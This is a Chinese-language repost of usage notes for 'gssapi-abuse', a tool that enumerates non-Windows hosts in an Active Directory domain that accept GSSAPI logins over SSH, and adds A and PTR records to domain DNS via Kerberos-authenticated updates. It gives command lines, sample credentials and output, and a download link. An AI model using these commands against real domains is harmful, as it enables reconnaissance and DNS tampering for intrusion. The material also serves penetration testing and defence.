gssapi-abuse - 枚举 Active Directory 网络中被滥用 GSSAPI 主机
2024-1-21 20:20:2 Author: 网络安全交流圈(查看原文) 阅读量:28 收藏

枚举模式

枚举模式将连接到 Active Directory,并对没有该单词的所有计算机执行 LDAP 搜索  Windows 在“操作系统”属性中。

获取非 Windows 计算机列表后,gssapi-abuse 将尝试通过 SSH 连接到每个主机,并确定是否允许基于 GSSAPI 的身份验证。

python .\gssapi-abuse.py -d ad.ginge.com enum -u john.doe -p SuperSecret![=] Found 2 non Windows machines registered within AD[!] Host ubuntu.ad.ginge.com does not have GSSAPI enabled over SSH, ignoring[+] Host centos.ad.ginge.com has GSSAPI enabled over SSH

DNS模式

DNS 模式利用 Kerberos 和 dnspython 使用 DNS-TSIG 协议通过端口 53 执行经过身份验证的 DNS 更新。现在  dns 模式依赖于有效的 krb5 配置,该配置具有针对特定域控制器的有效 TGT 或 DNS 服务票证,例如  DNS/dc1.victim.local

添加 DNS  A 主机记录  ahost.ad.ginge.com

python .\gssapi-abuse.py -d ad.ginge.com dns -t ahost -a add --type A --data 192.168.128.50[+] Successfully authenticated to DNS server win-af8ki8e5414.ad.ginge.com[=] Adding A record for target ahost using data 192.168.128.50[+] Applied 1 updates successfully

添加反向  PTR 主机记录  ahost.ad.ginge.com。请注意,  data 参数以  .,这很重要,否则记录将成为我们不希望看到的区域的相对记录。我们还需要指定要更新的目标区域,因为  PTR 记录存储在不同的区域中,以  A 记录。

python .\gssapi-abuse.py -d ad.ginge.com dns --zone 128.168.192.in-addr.arpa -t 50 -a add --type PTR --data ahost.ad.ginge.com.[+] Successfully authenticated to DNS server win-af8ki8e5414.ad.ginge.com[=] Adding PTR record for target 50 using data ahost.ad.ginge.com.[+] Applied 1 updates successfully

执行后的正向和反向DNS查找结果

nslookup ahost.ad.ginge.comServer:  WIN-AF8KI8E5414.ad.ginge.comAddress:  192.168.128.1
Name: ahost.ad.ginge.comAddress:  192.168.128.50

下载地址:https://github.com/CCob/gssapi-abuse

欢迎添加微信进行业务咨询:

承接以下业务:


文章来源: http://mp.weixin.qq.com/s?__biz=MzI1MDk3NDc5Mg==&mid=2247485196&idx=1&sn=48ca9c11c2760a60fae7fe7583a51f64&chksm=e823781c3ac2bf5f7e01a3408e947cc44cd3f51bd2e8b4d6d42f6879b2b95e79d4c962c6f78f&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh